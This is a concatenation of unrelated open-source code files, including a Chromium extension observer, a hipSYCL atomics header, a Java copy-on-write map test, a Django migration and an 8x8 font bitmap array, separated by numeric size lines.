  const auto* const extension_registry =
      extensions::ExtensionRegistry::Get(browser_context);
  if (!extension_registry)
    return false;
  const extensions::Extension* const extension =
      extension_registry->GetInstalledExtension(extension_id);
  if (!extension)
    return false;
  auto* const extension_system =
      extensions::ExtensionSystem::Get(browser_context);
  if (!extension_system)
    return false;
  return extension_system->runtime_data()->IsBackgroundPageReady(extension);
}

}  // namespace

// Starts observing BACKGROUND_PAGE_READY notifications immediately; the
// filter callback restricts them to |extension_id| in |browser_context|.
ExtensionBackgroundPageReadyObserver::ExtensionBackgroundPageReadyObserver(
    content::BrowserContext* browser_context,
    const extensions::ExtensionId& extension_id)
    : browser_context_(browser_context),
      extension_id_(extension_id),
      notification_observer_(
          extensions::NOTIFICATION_EXTENSION_BACKGROUND_PAGE_READY,
          base::BindRepeating(
              &ExtensionBackgroundPageReadyObserver::IsNotificationRelevant,
              base::Unretained(this))) {}

ExtensionBackgroundPageReadyObserver::~ExtensionBackgroundPageReadyObserver() =
    default;

// Blocks until a matching background-page-ready notification arrives.
void ExtensionBackgroundPageReadyObserver::Wait() {
  notification_observer_.Wait();
}

// Filter used by |notification_observer_|: accepts only notifications for
// our extension id whose readiness is confirmed by the extension system.
bool ExtensionBackgroundPageReadyObserver::IsNotificationRelevant(
    const content::NotificationSource& source,
    const content::NotificationDetails& /*details*/) const {
  if (content::Source<const extensions::Extension>(source)->id() !=
      extension_id_) {
    return false;
  }
  // Double-check via the extension system, since the notification could be
  // for a different profile.
  return IsExtensionBackgroundPageReady(browser_context_, extension_id_);
}

}  // namespace extensions
819
2,151
<reponame>oz90210/blackmamba<gh_stars>1000+ """Optional fixer that changes all unprefixed string literals "..." to b"...". br'abcd' is a SyntaxError on Python 2 but valid on Python 3. ur'abcd' is a SyntaxError on Python 3 but valid on Python 2. """ from __future__ import unicode_literals import re from lib2to3.pgen2 import token from lib2to3 import fixer_base _literal_re = re.compile(r"[^bBuUrR]?[\'\"]") class FixBytes(fixer_base.BaseFix): BM_compatible = True PATTERN = "STRING" def transform(self, node, results): if node.type == token.STRING: if _literal_re.match(node.value): new = node.clone() new.value = u'b' + new.value return new
308
1,338
/*
 * Copyright 2009-2010, <NAME>, <EMAIL>.
 * Distributed under the terms of the MIT License.
 */


#include <slab/Slab.h>

#include <stdlib.h>

#include <new>


// Minimal user-land stand-in for the kernel slab allocator: every allocation
// is served by plain malloc(), and only the constructor/destructor hooks and
// the object size are retained from the creation parameters.
struct ObjectCache {
	ObjectCache(const char *name, size_t objectSize, size_t alignment,
		size_t maxByteUsage, uint32 flags, void *cookie,
		object_cache_constructor constructor, object_cache_destructor destructor,
		object_cache_reclaimer reclaimer)
		:
		objectSize(objectSize),
		cookie(cookie),
		objectConstructor(constructor),
		objectDestructor(destructor)
	{
	}

	size_t					objectSize;
	void*					cookie;
	object_cache_constructor	objectConstructor;
	object_cache_destructor		objectDestructor;
};


// Creates a cache with no byte limit and no flags; returns NULL on
// allocation failure.
object_cache *
create_object_cache(const char *name, size_t objectSize, size_t alignment,
	void *cookie, object_cache_constructor constructor,
	object_cache_destructor destructor)
{
	return new(std::nothrow) ObjectCache(name, objectSize, alignment, 0, 0,
		cookie, constructor, destructor, NULL);
}


// Extended variant; the magazine/limit parameters are accepted for API
// compatibility but ignored by this malloc-backed implementation.
object_cache *
create_object_cache_etc(const char *name, size_t objectSize, size_t alignment,
	size_t maxByteUsage, size_t magazineCapacity, size_t maxMagazineCount,
	uint32 flags, void *cookie, object_cache_constructor constructor,
	object_cache_destructor destructor, object_cache_reclaimer reclaimer)
{
	return new(std::nothrow) ObjectCache(name, objectSize, alignment,
		maxByteUsage, flags, cookie, constructor, destructor, reclaimer);
}


// Destroys the cache itself; objects handed out earlier are not tracked.
void
delete_object_cache(object_cache *cache)
{
	delete cache;
}


// No reserve pool exists in this implementation; always succeeds.
status_t
object_cache_set_minimum_reserve(object_cache *cache, size_t objectCount)
{
	return B_OK;
}


// Allocates one object from the cache and runs the constructor hook, if any.
// Returns NULL when the cache is NULL or malloc() fails.
void *
object_cache_alloc(object_cache *cache, uint32 flags)
{
	if (cache == NULL)
		return NULL;

	void* object = malloc(cache->objectSize);
	if (object == NULL)
		return NULL;

	if (cache->objectConstructor != NULL)
		cache->objectConstructor(cache->cookie, object);

	return object;
}


// Runs the destructor hook (when both cache and hook exist) and frees the
// object; NULL objects are ignored.
void
object_cache_free(object_cache *cache, void *object, uint32 flags)
{
	if (object == NULL)
		return;

	if (cache != NULL && cache->objectDestructor != NULL)
		cache->objectDestructor(cache->cookie, object);

	free(object);
}


// Nothing to pre-reserve here; always succeeds.
status_t
object_cache_reserve(object_cache *cache, size_t object_count, uint32 flags)
{
	return B_OK;
}


// Usage is not tracked by this implementation; always reports zero.
void
object_cache_get_usage(object_cache *cache, size_t *_allocatedMemory)
{
	*_allocatedMemory = 0;
}
794
529
<filename>include/hipSYCL/sycl/libkernel/atomic.hpp<gh_stars>100-1000 /* * This file is part of hipSYCL, a SYCL implementation based on CUDA/HIP * * Copyright (c) 2018 <NAME> * All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions are met: * * 1. Redistributions of source code must retain the above copyright notice, this * list of conditions and the following disclaimer. * 2. Redistributions in binary form must reproduce the above copyright notice, * this list of conditions and the following disclaimer in the documentation * and/or other materials provided with the distribution. * * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED * WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE * DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR * ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES * (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND * ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT * (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS * SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 
*/ #ifndef HIPSYCL_ATOMIC_HPP #define HIPSYCL_ATOMIC_HPP #include <type_traits> #include "hipSYCL/sycl/access.hpp" #include "hipSYCL/sycl/libkernel/backend.hpp" #include "hipSYCL/sycl/libkernel/host/atomic_builtins.hpp" #include "hipSYCL/sycl/libkernel/memory.hpp" #include "multi_ptr.hpp" #include "atomic_builtins.hpp" namespace hipsycl { namespace sycl { #ifdef HIPSYCL_EXT_FP_ATOMICS #define HIPSYCL_CONDITIONALLY_ENABLE_ATOMICS(template_param) \ std::enable_if_t<std::is_integral<template_param>::value || std::is_floating_point<t>::value>* = nullptr #else #define HIPSYCL_CONDITIONALLY_ENABLE_ATOMICS(template_param) \ std::enable_if_t<std::is_integral<template_param>::value>* = nullptr #endif template <typename T, access::address_space addressSpace = access::address_space::global_space> class atomic { static constexpr memory_scope default_scope() { if(addressSpace == access::address_space::global_space) return memory_scope::device; else if(addressSpace == access::address_space::local_space) return memory_scope::work_group; else if(addressSpace == access::address_space::private_space) return memory_scope::work_item; return memory_scope::device; } public: template <typename pointerT> HIPSYCL_UNIVERSAL_TARGET atomic(multi_ptr<pointerT, addressSpace> ptr) : _ptr{reinterpret_cast<T*>(ptr.get())} { static_assert(sizeof(T) == sizeof(pointerT), "Invalid pointer type for atomic<>"); } HIPSYCL_KERNEL_TARGET void store(T operand, memory_order memoryOrder = memory_order::relaxed) volatile { detail::__hipsycl_atomic_store<addressSpace>( _ptr, operand, memoryOrder, default_scope()); } HIPSYCL_KERNEL_TARGET T load(memory_order memoryOrder = memory_order::relaxed) const volatile { return detail::__hipsycl_atomic_load<addressSpace>(_ptr, memoryOrder, default_scope()); } HIPSYCL_KERNEL_TARGET T exchange(T operand, memory_order memoryOrder = memory_order::relaxed) volatile { return detail::__hipsycl_atomic_exchange<addressSpace>( _ptr, operand, memoryOrder, default_scope()); } /* 
Available only when: T != float */ HIPSYCL_KERNEL_TARGET bool compare_exchange_strong(T &expected, T desired, memory_order successMemoryOrder = memory_order::relaxed, memory_order failMemoryOrder = memory_order::relaxed) volatile { return detail::__hipsycl_atomic_compare_exchange_strong<addressSpace>( _ptr, expected, desired, successMemoryOrder, failMemoryOrder, default_scope()); } /* Available only when: T != float */ template<class t = T, HIPSYCL_CONDITIONALLY_ENABLE_ATOMICS(t)> HIPSYCL_KERNEL_TARGET T fetch_add(T operand, memory_order memoryOrder = memory_order::relaxed) volatile { return detail::__hipsycl_atomic_fetch_add<addressSpace>( _ptr, operand, memoryOrder, default_scope()); } /* Available only when: T != float */ template<class t = T, HIPSYCL_CONDITIONALLY_ENABLE_ATOMICS(t)> HIPSYCL_KERNEL_TARGET T fetch_sub(T operand, memory_order memoryOrder = memory_order::relaxed) volatile { return detail::__hipsycl_atomic_fetch_sub<addressSpace>( _ptr, operand, memoryOrder, default_scope()); } /* Available only when: T != float */ template<class t = T, HIPSYCL_CONDITIONALLY_ENABLE_ATOMICS(t)> HIPSYCL_KERNEL_TARGET T fetch_and(T operand, memory_order memoryOrder = memory_order::relaxed) volatile { return detail::__hipsycl_atomic_fetch_and<addressSpace>( _ptr, operand, memoryOrder, default_scope()); } /* Available only when: T != float */ template<class t = T, HIPSYCL_CONDITIONALLY_ENABLE_ATOMICS(t)> HIPSYCL_KERNEL_TARGET T fetch_or(T operand, memory_order memoryOrder = memory_order::relaxed) volatile { return detail::__hipsycl_atomic_fetch_or<addressSpace>( _ptr, operand, memoryOrder, default_scope()); } /* Available only when: T != float */ template<class t = T, HIPSYCL_CONDITIONALLY_ENABLE_ATOMICS(t)> HIPSYCL_KERNEL_TARGET T fetch_xor(T operand, memory_order memoryOrder = memory_order::relaxed) volatile { return detail::__hipsycl_atomic_fetch_xor<addressSpace>( _ptr, operand, memoryOrder, default_scope()); } /* Available only when: T != float */ template<class t = 
T, HIPSYCL_CONDITIONALLY_ENABLE_ATOMICS(t)> HIPSYCL_KERNEL_TARGET T fetch_min(T operand, memory_order memoryOrder = memory_order::relaxed) volatile { return detail::__hipsycl_atomic_fetch_min<addressSpace>( _ptr, operand, memoryOrder, default_scope()); } /* Available only when: T != float */ template<class t = T, HIPSYCL_CONDITIONALLY_ENABLE_ATOMICS(t)> HIPSYCL_KERNEL_TARGET T fetch_max(T operand, memory_order memoryOrder = memory_order::relaxed) volatile { return detail::__hipsycl_atomic_fetch_max<addressSpace>( _ptr, operand, memoryOrder, default_scope()); } private: T* _ptr; }; template <typename T, access::address_space addressSpace> HIPSYCL_KERNEL_TARGET void atomic_store(atomic<T, addressSpace> object, T operand, memory_order memoryOrder = memory_order::relaxed) { object.store(operand, memoryOrder); } template <typename T, access::address_space addressSpace> HIPSYCL_KERNEL_TARGET T atomic_load(atomic<T, addressSpace> object, memory_order memoryOrder = memory_order::relaxed) { return object.load(memoryOrder); } template <typename T, access::address_space addressSpace> HIPSYCL_KERNEL_TARGET T atomic_exchange(atomic<T, addressSpace> object, T operand, memory_order memoryOrder = memory_order::relaxed) { return object.exchange(operand, memoryOrder); } template <typename T, access::address_space addressSpace> HIPSYCL_KERNEL_TARGET bool atomic_compare_exchange_strong(atomic<T, addressSpace> object, T &expected, T desired, memory_order successMemoryOrder = memory_order::relaxed, memory_order failMemoryOrder = memory_order::relaxed) { return object.compare_exchange_strong(expected, desired, successMemoryOrder, failMemoryOrder); } template <typename T, access::address_space addressSpace> HIPSYCL_KERNEL_TARGET T atomic_fetch_add(atomic<T, addressSpace> object, T operand, memory_order memoryOrder = memory_order::relaxed) { return object.fetch_add(operand, memoryOrder); } template <typename T, access::address_space addressSpace> HIPSYCL_KERNEL_TARGET T 
atomic_fetch_sub(atomic<T, addressSpace> object, T operand, memory_order memoryOrder = memory_order::relaxed) { return object.fetch_sub(operand, memoryOrder); } template <typename T, access::address_space addressSpace> HIPSYCL_KERNEL_TARGET T atomic_fetch_and(atomic<T, addressSpace> object, T operand, memory_order memoryOrder = memory_order::relaxed) { return object.fetch_and(operand, memoryOrder); } template <typename T, access::address_space addressSpace> HIPSYCL_KERNEL_TARGET T atomic_fetch_or(atomic<T, addressSpace> object, T operand, memory_order memoryOrder = memory_order::relaxed) { return object.fetch_or(operand, memoryOrder); } template <typename T, access::address_space addressSpace> HIPSYCL_KERNEL_TARGET T atomic_fetch_xor(atomic<T, addressSpace> object, T operand, memory_order memoryOrder = memory_order::relaxed) { return object.fetch_xor(operand, memoryOrder); } template <typename T, access::address_space addressSpace> HIPSYCL_KERNEL_TARGET T atomic_fetch_min(atomic<T, addressSpace> object, T operand, memory_order memoryOrder = memory_order::relaxed) { return object.fetch_min(operand, memoryOrder); } template <typename T, access::address_space addressSpace> HIPSYCL_KERNEL_TARGET T atomic_fetch_max(atomic<T, addressSpace> object, T operand, memory_order memoryOrder = memory_order::relaxed) { return object.fetch_max(operand, memoryOrder); } } // namespace sycl } // namespace hipsycl #endif
3,815
1,682
/*
   Copyright (c) 2012 LinkedIn Corp.

   Licensed under the Apache License, Version 2.0 (the "License");
   you may not use this file except in compliance with the License.
   You may obtain a copy of the License at

       http://www.apache.org/licenses/LICENSE-2.0

   Unless required by applicable law or agreed to in writing, software
   distributed under the License is distributed on an "AS IS" BASIS,
   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
   See the License for the specific language governing permissions and
   limitations under the License.
*/

package com.linkedin.data.collections;

import java.util.Collection;
import java.util.Map;
import java.util.Set;
import org.testng.annotations.Test;

import static com.linkedin.data.collections.TestCommonMap.containsReferenceMap2;
import static com.linkedin.data.collections.TestCommonMap.referenceMap1;
import static com.linkedin.data.collections.TestCommonMap.referenceMap2;
import static com.linkedin.data.collections.TestCommonMap.testAgainstReferenceMap1;
import static org.testng.Assert.assertEquals;
import static org.testng.Assert.assertFalse;
import static org.testng.Assert.assertTrue;

/**
 * Tests the copy-on-write behavior of {@link CowMap}.
 *
 * The test observes sharing through {@code getRefCounted()}: clones share one
 * underlying ref-counted map (same identity, incremented ref count) until a
 * mutating call, at which point the mutated clone detaches to its own copy
 * (identity changes, its ref count drops to 0 and the shared one decreases).
 * NOTE(review): the ref count appears to count clones in addition to the
 * original holder, i.e. a map with no clones reports 0 — the assertions below
 * are written against that convention.
 */
public class TestCowMap
{
  @Test
  public void testCopyOnWrite() throws CloneNotSupportedException
  {
    // A fresh map holds its underlying object exclusively: ref count 0.
    CowMap<String, String> map1 = new CowMap<>(referenceMap1);
    testAgainstReferenceMap1(map1);
    assertEquals(map1.getRefCounted().getRefCount(), 0);

    // First clone shares the underlying object; ref count rises to 1.
    CowMap<String,String> map2 = map1.clone();
    assertEquals(map1.getRefCounted().getRefCount(), 1);
    assertTrue(map2.getRefCounted() == map1.getRefCounted());
    // Reading through the clone must not break sharing.
    testAgainstReferenceMap1(map2);
    assertEquals(map1.getRefCounted().getRefCount(), 1);
    assertTrue(map2.getRefCounted() == map1.getRefCounted());

    // Second clone: ref count rises to 2, still one shared object.
    CowMap<String,String> map3 = map1.clone();
    assertEquals(map1.getRefCounted().getRefCount(), 2);
    assertTrue(map3.getRefCounted() == map1.getRefCounted());
    testAgainstReferenceMap1(map3);
    assertEquals(map1.getRefCounted().getRefCount(), 2);
    assertTrue(map3.getRefCounted() == map1.getRefCounted());

    // Exercise every read-only operation; none of them may trigger a copy.
    map3.containsKey("a");
    map3.containsKey("k1");
    map3.containsValue("");
    map3.containsValue("1");
    map3.entrySet();
    map3.get("a");
    map3.get("k1");
    map3.isEmpty();
    map3.keySet();
    map3.size();
    map3.values();
    map3.equals("a");
    map3.equals(map1);
    map3.hashCode();
    map3.toString();
    assertTrue(map3.getRefCounted() == map1.getRefCounted());

    // put() is a write: map2 must detach to its own copy, leaving map1/map3
    // still sharing (count 1) and map2 exclusive (count 0).
    map2.put("k4", "4");
    assertEquals(map2.get("k4"), "4");
    assertTrue(map2.containsKey("k4"));
    assertFalse(map1.containsKey("k4"));
    assertFalse(map3.containsKey("k4"));
    assertTrue(map3.getRefCounted() == map1.getRefCounted());
    assertTrue(map2.getRefCounted() != map1.getRefCounted());
    assertEquals(map1.getRefCounted().getRefCount(), 1);
    assertEquals(map2.getRefCounted().getRefCount(), 0);

    // clear() is a write and detaches the clone.
    CowMap<String,String> map4 = map3.clone();
    assertTrue(map4.getRefCounted() == map3.getRefCounted());
    assertEquals(map3.getRefCounted().getRefCount(), 2);
    map4.clear();
    assertEquals(map4.size(), 0);
    assertTrue(map4.isEmpty());
    assertEquals(map3.getRefCounted().getRefCount(), 1);
    assertEquals(map4.getRefCounted().getRefCount(), 0);
    assertTrue(map4.getRefCounted() != map3.getRefCounted());

    // putAll() is a write and detaches the clone.
    CowMap<String,String> map5 = map3.clone();
    assertTrue(map5.getRefCounted() == map3.getRefCounted());
    assertEquals(map3.getRefCounted().getRefCount(), 2);
    map5.putAll(referenceMap2);
    containsReferenceMap2(map5);
    assertEquals(map5.size(), referenceMap1.size() + referenceMap2.size());
    assertEquals(map3.getRefCounted().getRefCount(), 1);
    assertEquals(map5.getRefCounted().getRefCount(), 0);
    assertTrue(map5.getRefCounted() != map3.getRefCounted());

    // remove() is a write and detaches the clone.
    CowMap<String,String> map6 = map3.clone();
    assertTrue(map6.getRefCounted() == map3.getRefCounted());
    assertEquals(map6.getRefCounted().getRefCount(), 2);
    map6.remove("k1");
    assertFalse(map6.containsKey("k1"));
    assertEquals(map6.size(), referenceMap1.size() - 1);
    assertEquals(map3.getRefCounted().getRefCount(), 1);
    assertEquals(map6.getRefCounted().getRefCount(), 0);
    assertTrue(map6.getRefCounted() != map3.getRefCounted());

    // A read-only clone keeps sharing even when views are materialized,
    // and invalidate() releases its reference (getRefCounted() becomes null).
    CowMap<String,String> map7 = map3.clone();
    assertTrue(map7.getRefCounted() == map3.getRefCounted());
    assertEquals(map7.getRefCounted().getRefCount(), 2);
    map7.containsKey("k1");
    map7.containsValue("1");
    map7.get("k1");
    map7.isEmpty();
    map7.size();
    map7.hashCode();
    map7.equals(map6);
    map7.toString();
    assertTrue(map7.getRefCounted() == map3.getRefCounted());
    map7.setReadOnly();
    Set<Map.Entry<String,String>> set7 = map7.entrySet();
    assertEquals(set7, map7.getRefCounted().getObject().entrySet());
    Set<String> set7a = map7.keySet();
    assertEquals(set7a, map7.getRefCounted().getObject().keySet());
    Collection<String> c7 = map7.values();
    assertEquals(c7, map7.getRefCounted().getObject().values());
    assertTrue(map7.getRefCounted() == map3.getRefCounted());
    map7.invalidate();
    assertEquals(map3.getRefCounted().getRefCount(), 1);
    assertTrue(map7.getRefCounted() == null);

    Exception exc = null;

    // The entrySet() view of a shared map must reject mutation.
    CowMap<String,String> map8 = map3.clone();
    assertTrue(map8.getRefCounted() == map3.getRefCounted());
    assertEquals(map8.getRefCounted().getRefCount(), 2);
    Set<Map.Entry<String,String>> set8 = map8.entrySet();
    assertEquals(set8, map8.getRefCounted().getObject().entrySet());
    assertTrue(map8.getRefCounted() == map3.getRefCounted());
    try
    {
      exc = null;
      set8.clear();
    }
    catch (UnsupportedOperationException e)
    {
      exc = e;
    }
    assertTrue(exc != null);
    map8.invalidate();

    // The keySet() view must likewise reject mutation.
    CowMap<String,String> map9 = map3.clone();
    assertTrue(map9.getRefCounted() == map3.getRefCounted());
    assertEquals(map9.getRefCounted().getRefCount(), 2);
    Set<String> set9 = map9.keySet();
    assertEquals(set9, map9.getRefCounted().getObject().keySet());
    assertTrue(map9.getRefCounted() == map3.getRefCounted());
    try
    {
      exc = null;
      set9.clear();
    }
    catch (UnsupportedOperationException e)
    {
      exc = e;
    }
    assertTrue(exc != null);
    map9.invalidate();

    // The values() view must likewise reject mutation.
    CowMap<String,String> map10 = map3.clone();
    assertTrue(map10.getRefCounted() == map3.getRefCounted());
    assertEquals(map10.getRefCounted().getRefCount(), 2);
    Collection<String> c10 = map10.values();
    assertEquals(c10, map10.getRefCounted().getObject().values());
    assertTrue(map10.getRefCounted() == map3.getRefCounted());
    try
    {
      exc = null;
      c10.clear();
    }
    catch (UnsupportedOperationException e)
    {
      exc = e;
    }
    assertTrue(exc != null);
    map10.invalidate();
  }
}
2,669
2,542
// ------------------------------------------------------------ // Copyright (c) Microsoft Corporation. All rights reserved. // Licensed under the MIT License (MIT). See License.txt in the repo root for license information. // ------------------------------------------------------------ #pragma once #include <sal.h> #include <ktl.h> #include <KTpl.h> namespace Data { namespace LoggingReplicator { using ::_delete; } } // Version Manager Factory is a test class that is being exposed tp enable upper layer components to be tested. // DO NOT USE IT IN PRODUCTION. #include "VersionManagerFactory.h"
166
2,831
<reponame>189569400/ClickHouse #ifndef BOOST_TYPE_TRAITS_COPY_CV_HPP_INCLUDED #define BOOST_TYPE_TRAITS_COPY_CV_HPP_INCLUDED // // Copyright 2015 <NAME> // // Distributed under the Boost Software License, Version 1.0. // See accompanying file LICENSE_1_0.txt or copy at // http://www.boost.org/LICENSE_1_0.txt // #include <boost/type_traits/is_const.hpp> #include <boost/type_traits/is_volatile.hpp> #include <boost/type_traits/add_const.hpp> #include <boost/type_traits/add_volatile.hpp> #include <boost/type_traits/conditional.hpp> namespace boost { template<class T, class U> struct copy_cv { private: typedef typename boost::conditional<boost::is_const<U>::value, typename boost::add_const<T>::type, T>::type CT; public: typedef typename boost::conditional<boost::is_volatile<U>::value, typename boost::add_volatile<CT>::type, CT>::type type; }; } // namespace boost #endif // #ifndef BOOST_TYPE_TRAITS_COPY_CV_HPP_INCLUDED
382
977
package io.leangen.graphql.annotations;

import java.lang.annotation.ElementType;
import java.lang.annotation.Inherited;
import java.lang.annotation.Retention;
import java.lang.annotation.RetentionPolicy;
import java.lang.annotation.Target;

import io.leangen.graphql.execution.TypeResolver;

/**
 * Associates a {@link TypeResolver} implementation with the annotated type or
 * method. The annotation is inherited by subclasses and retained at runtime
 * so it can be discovered reflectively.
 */
@Inherited
@Retention(RetentionPolicy.RUNTIME)
@Target({ElementType.TYPE, ElementType.METHOD})
public @interface GraphQLTypeResolver {

    /** The {@link TypeResolver} class to instantiate for the annotated element. */
    Class<? extends TypeResolver> value();
}
171
1,143
# -*- coding: utf-8 -*- # Generated by Django 1.11.13 on 2018-05-28 15:00 from __future__ import unicode_literals from django.db import migrations, models class Migration(migrations.Migration): initial = True dependencies = [ ] operations = [ migrations.CreateModel( name='ActiveTokenModel', fields=[ ('version', models.BigIntegerField()), ('name', models.CharField(max_length=255, primary_key=True, serialize=False)), ('owner', models.CharField(blank=True, max_length=255, null=True)), ('expirationTime', models.BigIntegerField(blank=True, null=True)), ('priority', models.FloatField(blank=True, null=True)), ('data', models.TextField(blank=True, null=True)), ], options={ 'abstract': False, 'db_table': 'active_tokens_MRSXMLLFNR3GS43QOJQW443LMV3GSY3IOVZQ____', }, ), migrations.CreateModel( name='ArchivedTokenModel', fields=[ ('version', models.BigIntegerField()), ('name', models.CharField(max_length=255, primary_key=True, serialize=False)), ('owner', models.CharField(blank=True, max_length=255, null=True)), ('expirationTime', models.BigIntegerField(blank=True, null=True)), ('priority', models.FloatField(blank=True, null=True)), ('data', models.TextField(blank=True, null=True)), ], options={ 'abstract': False, 'db_table': 'archived_tokens_MRSXMLLFNR3GS43QOJQW443LMV3GSY3IOVZQ____', }, ), migrations.CreateModel( name='CachedDataModel', fields=[ ('name', models.CharField(max_length=255, primary_key=True, serialize=False)), ('data', models.TextField(blank=True, null=True)), ], options={ 'db_table': 'cached_data_MRSXMLLFNR3GS43QOJQW443LMV3GSY3IOVZQ____', }, ), ]
1,077
507
<gh_stars>100-1000 /* * file './font-bin/dtk_erso_2__8x8.bin', filesize 1024bytes, linewidth=8bytes * array created from bin-file by bin2header * bin2header (c) 2013 <NAME>, <<EMAIL>> * */ uint8_t dtk_erso_2__8x8[1024] = { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x7e, 0x81, 0xa5, 0x81, 0xa5, 0xbd, 0x81, 0x7e, 0x7e, 0xff, 0xdb, 0xff, 0xdb, 0xc3, 0xff, 0x7e, 0x36, 0x7f, 0x7f, 0x7f, 0x3e, 0x1c, 0x08, 0x00, 0x08, 0x1c, 0x3e, 0x7f, 0x3e, 0x1c, 0x08, 0x00, 0x1c, 0x3e, 0x1c, 0x7f, 0x7f, 0x3e, 0x1c, 0x3e, 0x08, 0x08, 0x1c, 0x3e, 0x7f, 0x3e, 0x1c, 0x3e, 0x00, 0x00, 0x18, 0x3c, 0x3c, 0x18, 0x00, 0x00, 0xff, 0xff, 0xe7, 0xc3, 0xc3, 0xe7, 0xff, 0xff, 0x00, 0x3c, 0x66, 0x42, 0x42, 0x66, 0x3c, 0x00, 0xff, 0xc3, 0x99, 0xbd, 0xbd, 0x99, 0xc3, 0xff, 0x1f, 0x07, 0x0f, 0x79, 0xcc, 0xcc, 0xcc, 0x78, 0x3c, 0x66, 0x66, 0x66, 0x3c, 0x18, 0x7e, 0x18, 0x1c, 0x1e, 0x19, 0x1b, 0x3a, 0x70, 0xf0, 0xe0, 0x7f, 0x63, 0x7f, 0x63, 0xe3, 0xe7, 0xc7, 0x06, 0x99, 0x5a, 0x3c, 0xe7, 0xe7, 0x3c, 0x5a, 0x99, 0x40, 0x70, 0x7c, 0x7f, 0x7c, 0x70, 0x40, 0x00, 0x01, 0x07, 0x1f, 0x7f, 0x1f, 0x07, 0x01, 0x00, 0x18, 0x3c, 0x7e, 0x18, 0x18, 0x7e, 0x3c, 0x18, 0x66, 0x66, 0x66, 0x66, 0x66, 0x00, 0x66, 0x00, 0x7f, 0xdb, 0xdb, 0x7b, 0x1b, 0x1b, 0x19, 0x00, 0x1e, 0x31, 0x1c, 0x36, 0x36, 0x1c, 0x46, 0x3c, 0x00, 0x00, 0x00, 0x7e, 0x7e, 0x7e, 0x00, 0x00, 0x18, 0x3c, 0x7e, 0x18, 0x7e, 0x3c, 0x18, 0xff, 0x0c, 0x1e, 0x3f, 0x0c, 0x0c, 0x0c, 0x0c, 0x00, 0x0c, 0x0c, 0x0c, 0x0c, 0x3f, 0x1e, 0x0c, 0x00, 0x00, 0x0c, 0x06, 0x7f, 0x06, 0x0c, 0x00, 0x00, 0x00, 0x18, 0x30, 0x7f, 0x30, 0x18, 0x00, 0x00, 0x00, 0x00, 0x60, 0x60, 0x60, 0x7f, 0x00, 0x00, 0x00, 0x00, 0x24, 0x66, 0xff, 0x66, 0x24, 0x00, 0x00, 0x00, 0x18, 0x3c, 0x7f, 0xff, 0xff, 0x00, 0x00, 0x00, 0xff, 0xff, 0x7e, 0x3c, 0x18, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x18, 0x3c, 0x3c, 0x18, 0x18, 0x00, 0x18, 0x00, 0x36, 0x36, 0x36, 0x00, 0x00, 0x00, 0x00, 0x00, 0x36, 0x36, 0x7f, 0x36, 0x7f, 0x36, 0x36, 0x00, 0x0c, 0x3f, 0x68, 0x3e, 0x0b, 0x7e, 0x18, 0x08, 
0x62, 0x66, 0x0c, 0x18, 0x30, 0x66, 0x46, 0x00, 0x1c, 0x36, 0x1c, 0x18, 0x3d, 0x66, 0x3d, 0x00, 0x18, 0x18, 0x30, 0x00, 0x00, 0x00, 0x00, 0x00, 0x0c, 0x18, 0x30, 0x30, 0x30, 0x18, 0x0c, 0x00, 0x30, 0x18, 0x0c, 0x0c, 0x0c, 0x18, 0x30, 0x00, 0x00, 0x42, 0x3c, 0x7e, 0x3c, 0x42, 0x00, 0x00, 0x00, 0x18, 0x18, 0x7e, 0x18, 0x18, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x18, 0x18, 0x30, 0x00, 0x00, 0x00, 0x7e, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x18, 0x18, 0x00, 0x03, 0x06, 0x0c, 0x18, 0x30, 0x60, 0x40, 0x00, 0x3e, 0x67, 0x6f, 0x7b, 0x73, 0x63, 0x3e, 0x00, 0x0c, 0x1c, 0x0c, 0x0c, 0x0c, 0x0c, 0x3f, 0x00, 0x3c, 0x66, 0x06, 0x1c, 0x30, 0x66, 0x7e, 0x00, 0x3c, 0x66, 0x06, 0x1c, 0x06, 0x66, 0x3c, 0x00, 0x0e, 0x1e, 0x36, 0x66, 0x7f, 0x06, 0x06, 0x00, 0x7e, 0x60, 0x7c, 0x06, 0x06, 0x66, 0x3c, 0x00, 0x3c, 0x66, 0x60, 0x7c, 0x66, 0x66, 0x3c, 0x00, 0x7e, 0x66, 0x06, 0x0c, 0x18, 0x18, 0x18, 0x00, 0x3c, 0x66, 0x66, 0x3c, 0x66, 0x66, 0x3c, 0x00, 0x3c, 0x66, 0x66, 0x3e, 0x06, 0x66, 0x3c, 0x00, 0x00, 0x18, 0x18, 0x00, 0x00, 0x18, 0x18, 0x00, 0x00, 0x18, 0x18, 0x00, 0x00, 0x18, 0x18, 0x30, 0x0c, 0x18, 0x30, 0x60, 0x30, 0x18, 0x0c, 0x00, 0x00, 0x00, 0x7e, 0x00, 0x7e, 0x00, 0x00, 0x00, 0x30, 0x18, 0x0c, 0x06, 0x0c, 0x18, 0x30, 0x00, 0x3c, 0x66, 0x66, 0x0c, 0x18, 0x00, 0x18, 0x00, 0x3e, 0x63, 0x6f, 0x6b, 0x6f, 0x60, 0x3e, 0x00, 0x18, 0x3c, 0x66, 0x66, 0x7e, 0x66, 0x66, 0x00, 0x7e, 0x33, 0x33, 0x3e, 0x33, 0x33, 0x7e, 0x00, 0x1f, 0x33, 